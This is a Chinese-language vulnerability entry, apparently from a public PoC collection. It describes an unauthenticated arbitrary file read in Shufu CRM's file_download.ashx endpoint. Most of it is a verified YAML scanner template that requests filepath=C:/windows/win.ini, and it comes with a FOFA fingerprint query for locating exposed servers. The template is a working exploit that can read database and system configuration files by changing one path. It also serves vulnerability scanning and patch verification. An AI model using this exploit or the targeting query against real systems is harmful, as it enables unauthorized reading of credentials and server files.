shufu-crm-file-download-fileread: 数夫CRM客户关系管理系统 file_download.ashx 任意文件读取漏洞

日期: 2025-09-01 | 影响软件: 数夫CRM客户关系管理系统 | POC: 已公开

漏洞描述

数夫CRM客户关系管理系统 file_download.ashx 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。 fofa:icon_hash="-244202779"

PoC代码[已公开]

id: shufu-crm-file-download-fileread

info:
  name: 数夫CRM客户关系管理系统 file_download.ashx 任意文件读取漏洞
  author: avic123
  severity: high
  verified: true
  description: |
    数夫CRM客户关系管理系统  file_download.ashx 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
    fofa:icon_hash="-244202779"
  reference:
    - https://cn-sec.com/archives/4364656.html
  tags: CRM,readfile
  created: 2025/08/13

rules:
  r0:
    request:
      method: GET
      path: /Web/common/Handler/file_download.ashx?filepath=C:/windows/win.ini
    expression: response.status == 200 && response.body.bcontains(b"bit app support") && response.body.bcontains(b"fonts") && response.body.bcontains(b"[extensions]")
expression: r0()